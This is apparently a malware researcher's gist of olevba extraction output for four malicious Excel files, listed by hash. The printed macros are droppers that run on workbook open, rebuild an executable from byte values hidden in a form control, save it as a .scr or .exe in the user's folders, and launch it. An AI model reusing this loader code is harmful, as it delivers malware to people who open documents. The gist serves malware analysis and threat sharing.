Created
September 24, 2018 00:02
-
-
Save JohnLaTwC/4a9f35757ad794d26369759f9726ee63 to your computer and use it in GitHub Desktop.
VBA threat
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## Uploaded by @JohnLaTwC | |
| ############################################################################## | |
| ## 5c50ffa5477cd57cef30457a8bd9064b24766ba57efd46a3d7b5917314b0fea2 | |
| olevba3 0.53.1 - http://decalage.info/python/oletools | |
| Flags Filename | |
| ----------- ----------------------------------------------------------------- | |
| OLE:MAS-H--- 5c50ffa5477cd57cef30457a8bd9064b24766ba57efd46a3d7b5917314b0fea2 | |
| =============================================================================== | |
| FILE: 5c50ffa5477cd57cef30457a8bd9064b24766ba57efd46a3d7b5917314b0fea2 | |
| Type: OLE | |
| ------------------------------------------------------------------------------- | |
| VBA MACRO ThisWorkbook.cls | |
| in file: 5c50ffa5477cd57cef30457a8bd9064b24766ba57efd46a3d7b5917314b0fea2 - OLE stream: '_VBA_PROJECT_CUR/VBA/ThisWorkbook' | |
| - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - | |
| Private Sub Workbook_Open() | |
| Call userWorLoadr | |
| Call userxlrLoadr | |
| End Sub | |
| ------------------------------------------------------------------------------- | |
| VBA MACRO Sheet1.cls | |
| in file: 5c50ffa5477cd57cef30457a8bd9064b24766ba57efd46a3d7b5917314b0fea2 - OLE stream: '_VBA_PROJECT_CUR/VBA/Sheet1' | |
| - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - | |
| (empty macro) | |
| ------------------------------------------------------------------------------- | |
| VBA MACRO Sheet2.cls | |
| in file: 5c50ffa5477cd57cef30457a8bd9064b24766ba57efd46a3d7b5917314b0fea2 - OLE stream: '_VBA_PROJECT_CUR/VBA/Sheet2' | |
| - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - | |
| (empty macro) | |
| ------------------------------------------------------------------------------- | |
| VBA MACRO Module1.bas | |
| in file: 5c50ffa5477cd57cef30457a8bd9064b24766ba57efd46a3d7b5917314b0fea2 - OLE stream: '_VBA_PROJECT_CUR/VBA/Module1' | |
| - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - | |
| Function getUniFileName(pp As String) | |
| Dim FileName As String | |
| FileName = ThisWorkbook.Name | |
| If InStr(FileName, ".") > 0 Then | |
| FileName = Left(FileName, InStr(FileName, ".") - 1) | |
| End If | |
| path_file = Environ$("USERPROFILE") & "\Documents" | |
| If Dir(path_file, vbDirectory) = "" Then | |
| path_file = Environ$("USERPROFILE") & "\Downloads" | |
| End If | |
| If Dir(path_file, vbDirectory) = "" Then | |
| path_file = Environ$("USERPROFILE") & "\AppData" | |
| End If | |
| getUniFileName = path_file & "\" & pp & FileName | |
| End Function | |
| Sub userWorLoadr() | |
| Dim iFileNum As Integer | |
| Dim path_file As String | |
| Dim path_U_dom As String | |
| path_U_dom = "RE" | |
| path_file = getUniFileName("") & "_" & Format(Now, "hh-mm-ss") & ".scr" | |
| Dim ar1() As String | |
| Dim bts() As Byte | |
| ar1 = Split(uForm.tBox.Text, "|") | |
| Dim lin As Double | |
| lin = 0 | |
| For Each vl In ar1 | |
| ReDim Preserve bts(lin) | |
| bts(lin) = CByte(vl) | |
| lin = lin + 1 | |
| Next | |
| Open path_file For Binary Access Write As #1 | |
| Put #1, , bts | |
| Close #1 | |
| loadMyPro path_file | |
| End Sub | |
| Sub userxlrLoadr() | |
| Sheet2.Visible = xlSheetVisible | |
| Sheet2.Copy | |
| End Sub | |
| Sub loadMyPro(strProgramName As String) | |
| Dim path_U_dom As String | |
| Dim strArgument As String | |
| Call Shell(strProgramName, vbNormalFocus) | |
| End Sub | |
| ------------------------------------------------------------------------------- | |
| VBA MACRO uForm.frm | |
| in file: 5c50ffa5477cd57cef30457a8bd9064b24766ba57efd46a3d7b5917314b0fea2 - OLE stream: '_VBA_PROJECT_CUR/VBA/uForm' | |
| - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - | |
| Private Sub TextBox1_Change() | |
| End Sub | |
| ############################################################################## | |
| ## 64cba718ce6e2f42e67e2da37e303ddbee256456137b178382e264e3d98b6252 | |
| olevba3 0.53.1 - http://decalage.info/python/oletools | |
| Flags Filename | |
| ----------- ----------------------------------------------------------------- | |
| OLE:MAS-HB-- 64cba718ce6e2f42e67e2da37e303ddbee256456137b178382e264e3d98b6252 | |
| =============================================================================== | |
| FILE: 64cba718ce6e2f42e67e2da37e303ddbee256456137b178382e264e3d98b6252 | |
| Type: OLE | |
| ------------------------------------------------------------------------------- | |
| VBA MACRO Module1.bas | |
| in file: 64cba718ce6e2f42e67e2da37e303ddbee256456137b178382e264e3d98b6252 - OLE stream: '_VBA_PROJECT_CUR/VBA/Module1' | |
| - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - | |
| Sub WaitFo(NumOfSeconds As Long) | |
| Dim SngSec As Long | |
| Dim path_dom As String | |
| path_dom = "ddYT4B5RV3DCuu" | |
| SngSec = Timer + NumOfSeconds | |
| Do While Timer < SngSec | |
| DoEvents | |
| Loop | |
| path_dom = "dddYT4B5RV3DCuu" | |
| End Sub | |
| Sub loadPro(strProgramName As String) | |
| Dim path_dom As String | |
| Dim strArgument As String | |
| path_dom = "ddsddYT4B5RV3DCuu%u" | |
| Call Shell(strProgramName, vbNormalFocus) | |
| End Sub | |
| Function ruString(cb As Integer) As String | |
| Randomize | |
| Dim rgch As String | |
| rgch = "ghiabcdefjklqrstuvwmnopxyz" | |
| rgch = rgch & UCase(rgch) & "1348906257" | |
| Dim i As Long | |
| For i = 1 To cb | |
| ruString = ruString & Mid$(rgch, Int(Rnd() * Len(rgch) + 1), 1) | |
| Next | |
| End Function | |
| Sub newLoadr() | |
| Dim row As Long | |
| Dim path_file As String | |
| Dim path_dom As String | |
| path_dom = "YT4B5RV3DC" | |
| path_dom = ruString(6) | |
| path_file = Environ("Temp") + "\" + path_dom + ".exe" | |
| path_dom = "dYT4B5RV3DCu" | |
| Dim ar() As String | |
| If Len(Dir(path_file)) = 0 Then | |
| ar = Split(UserForm1.TextBox1.Text, ",") | |
| path_dom = "dYT4B5RV3DCu" | |
| Open path_file For Binary As #1 | |
| Seek #1, LOF(1) + 1 | |
| For row = LBound(ar) To UBound(ar) | |
| Put #1, , CByte(ar(row)) | |
| Next | |
| Close #1 | |
| Call WaitFo(1) | |
| path_dom = "ddsYT4B5RV3DCu" | |
| End If | |
| path_dom = "ddsdYT4B5RV3DCu" | |
| loadPro path_file | |
| Workbooks.Add | |
| End Sub | |
| ------------------------------------------------------------------------------- | |
| VBA MACRO ThisWorkbook.cls | |
| in file: 64cba718ce6e2f42e67e2da37e303ddbee256456137b178382e264e3d98b6252 - OLE stream: '_VBA_PROJECT_CUR/VBA/ThisWorkbook' | |
| - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - | |
| Private Sub Workbook_Open() | |
| Call newLoadr | |
| End Sub | |
| ------------------------------------------------------------------------------- | |
| VBA MACRO Sheet1.cls | |
| in file: 64cba718ce6e2f42e67e2da37e303ddbee256456137b178382e264e3d98b6252 - OLE stream: '_VBA_PROJECT_CUR/VBA/Sheet1' | |
| - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - | |
| (empty macro) | |
| ------------------------------------------------------------------------------- | |
| VBA MACRO UserForm1.frm | |
| in file: 64cba718ce6e2f42e67e2da37e303ddbee256456137b178382e264e3d98b6252 - OLE stream: '_VBA_PROJECT_CUR/VBA/UserForm1' | |
| - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - | |
| Private Sub TextBox1_Change() | |
| End Sub | |
| ############################################################################## | |
| ## a9379c28c20c8fe7058ad132ad7750f7aa99a9e9c79a6bd47e82d2e03716454b | |
| olevba3 0.53.1 - http://decalage.info/python/oletools | |
| Flags Filename | |
| ----------- ----------------------------------------------------------------- | |
| OLE:MAS-H--- a9379c28c20c8fe7058ad132ad7750f7aa99a9e9c79a6bd47e82d2e03716454b | |
| =============================================================================== | |
| FILE: a9379c28c20c8fe7058ad132ad7750f7aa99a9e9c79a6bd47e82d2e03716454b | |
| Type: OLE | |
| ------------------------------------------------------------------------------- | |
| VBA MACRO ThisWorkbook.cls | |
| in file: a9379c28c20c8fe7058ad132ad7750f7aa99a9e9c79a6bd47e82d2e03716454b - OLE stream: '_VBA_PROJECT_CUR/VBA/ThisWorkbook' | |
| - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - | |
| Private Sub Workbook_Open() | |
| Call userWorLoadr | |
| Call userxlrLoadr | |
| End Sub | |
| ------------------------------------------------------------------------------- | |
| VBA MACRO Sheet1.cls | |
| in file: a9379c28c20c8fe7058ad132ad7750f7aa99a9e9c79a6bd47e82d2e03716454b - OLE stream: '_VBA_PROJECT_CUR/VBA/Sheet1' | |
| - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - | |
| (empty macro) | |
| ------------------------------------------------------------------------------- | |
| VBA MACRO Sheet2.cls | |
| in file: a9379c28c20c8fe7058ad132ad7750f7aa99a9e9c79a6bd47e82d2e03716454b - OLE stream: '_VBA_PROJECT_CUR/VBA/Sheet2' | |
| - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - | |
| (empty macro) | |
| ------------------------------------------------------------------------------- | |
| VBA MACRO Module1.bas | |
| in file: a9379c28c20c8fe7058ad132ad7750f7aa99a9e9c79a6bd47e82d2e03716454b - OLE stream: '_VBA_PROJECT_CUR/VBA/Module1' | |
| - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - | |
| Function getUniFileName(pp As String) | |
| Dim FileName As String | |
| FileName = ThisWorkbook.Name | |
| If InStr(FileName, ".") > 0 Then | |
| FileName = Left(FileName, InStr(FileName, ".") - 1) | |
| End If | |
| path_file = Environ$("USERPROFILE") & "\Documents" | |
| If Dir(path_file, vbDirectory) = "" Then | |
| path_file = Environ$("USERPROFILE") & "\Downloads" | |
| End If | |
| If Dir(path_file, vbDirectory) = "" Then | |
| path_file = Environ$("USERPROFILE") & "\AppData" | |
| End If | |
| getUniFileName = path_file & "\" & pp & FileName | |
| End Function | |
| Sub userWorLoadr() | |
| Dim iFileNum As Integer | |
| Dim path_file As String | |
| Dim path_U_dom As String | |
| path_U_dom = "RE" | |
| path_file = getUniFileName("") & "_" & Format(Now, "hh-mm-ss") & ".scr" | |
| Dim ar1() As String | |
| Dim bts() As Byte | |
| ar1 = Split(uForm.tBox.Text, "|") | |
| Dim lin As Double | |
| lin = 0 | |
| For Each vl In ar1 | |
| ReDim Preserve bts(lin) | |
| bts(lin) = CByte(vl) | |
| lin = lin + 1 | |
| Next | |
| Open path_file For Binary Access Write As #1 | |
| Put #1, , bts | |
| Close #1 | |
| loadMyPro path_file | |
| End Sub | |
| Sub userxlrLoadr() | |
| Sheet2.Visible = xlSheetVisible | |
| Sheet2.Copy | |
| End Sub | |
| Sub loadMyPro(strProgramName As String) | |
| Dim path_U_dom As String | |
| Dim strArgument As String | |
| Call Shell(strProgramName, vbNormalFocus) | |
| End Sub | |
| ------------------------------------------------------------------------------- | |
| VBA MACRO uForm.frm | |
| in file: a9379c28c20c8fe7058ad132ad7750f7aa99a9e9c79a6bd47e82d2e03716454b - OLE stream: '_VBA_PROJECT_CUR/VBA/uForm' | |
| - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - | |
| Private Sub TextBox1_Change() | |
| End Sub | |
| ############################################################################## | |
| ## 6f59a056b2aa576258ad31094f0e4561554d1d5857ed0372c178d8c31cb43f87 | |
| olevba3 0.53.1 - http://decalage.info/python/oletools | |
| Flags Filename | |
| ----------- ----------------------------------------------------------------- | |
| OLE:MAS-H--- 6258ad31094f0e4561554d1d5857ed0372c178d8c31cb43f87 | |
| =============================================================================== | |
| FILE: 6258ad31094f0e4561554d1d5857ed0372c178d8c31cb43f87 | |
| Type: OLE | |
| ------------------------------------------------------------------------------- | |
| VBA MACRO ThisWorkbook.cls | |
| in file: 6258ad31094f0e4561554d1d5857ed0372c178d8c31cb43f87 - OLE stream: '_VBA_PROJECT_CUR/VBA/ThisWorkbook' | |
| - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - | |
| Private Sub Workbook_Open() | |
| Call userWorLoadr | |
| Call userxlrLoadr | |
| End Sub | |
| ------------------------------------------------------------------------------- | |
| VBA MACRO Sheet1.cls | |
| in file: 6258ad31094f0e4561554d1d5857ed0372c178d8c31cb43f87 - OLE stream: '_VBA_PROJECT_CUR/VBA/Sheet1' | |
| - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - | |
| (empty macro) | |
| ------------------------------------------------------------------------------- | |
| VBA MACRO Sheet2.cls | |
| in file: 6258ad31094f0e4561554d1d5857ed0372c178d8c31cb43f87 - OLE stream: '_VBA_PROJECT_CUR/VBA/Sheet2' | |
| - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - | |
| (empty macro) | |
| ------------------------------------------------------------------------------- | |
| VBA MACRO Module1.bas | |
| in file: 6258ad31094f0e4561554d1d5857ed0372c178d8c31cb43f87 - OLE stream: '_VBA_PROJECT_CUR/VBA/Module1' | |
| - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - | |
| Function getUniFileName(pp As String) | |
| Dim FileName As String | |
| FileName = ThisWorkbook.Name | |
| If InStr(FileName, ".") > 0 Then | |
| FileName = Left(FileName, InStr(FileName, ".") - 1) | |
| End If | |
| path_file = Environ$("USERPROFILE") & "\Documents" | |
| If Dir(path_file, vbDirectory) = "" Then | |
| path_file = Environ$("USERPROFILE") & "\Downloads" | |
| End If | |
| If Dir(path_file, vbDirectory) = "" Then | |
| path_file = Environ$("USERPROFILE") & "\AppData" | |
| End If | |
| getUniFileName = path_file & "\" & pp & FileName | |
| End Function | |
| Sub userWorLoadr() | |
| Dim iFileNum As Integer | |
| Dim path_file As String | |
| Dim path_U_dom As String | |
| path_U_dom = "RE" | |
| path_file = getUniFileName("") & "_" & Format(Now, "hh-mm-ss") & ".scr" | |
| Dim ar1() As String | |
| Dim bts() As Byte | |
| ar1 = Split(uForm.tBox.Text, "|") | |
| Dim lin As Double | |
| lin = 0 | |
| For Each vl In ar1 | |
| ReDim Preserve bts(lin) | |
| bts(lin) = CByte(vl) | |
| lin = lin + 1 | |
| Next | |
| Open path_file For Binary Access Write As #1 | |
| Put #1, , bts | |
| Close #1 | |
| loadMyPro path_file | |
| End Sub | |
| Sub userxlrLoadr() | |
| Sheet2.Visible = xlSheetVisible | |
| Sheet2.Copy | |
| End Sub | |
| Sub loadMyPro(strProgramName As String) | |
| Dim path_U_dom As String | |
| Dim strArgument As String | |
| Call Shell(strProgramName, vbNormalFocus) | |
| End Sub | |
| ------------------------------------------------------------------------------- | |
| VBA MACRO uForm.frm | |
| in file: 6258ad31094f0e4561554d1d5857ed0372c178d8c31cb43f87 - OLE stream: '_VBA_PROJECT_CUR/VBA/uForm' | |
| - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - | |
| Private Sub TextBox1_Change() | |
| End Sub | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment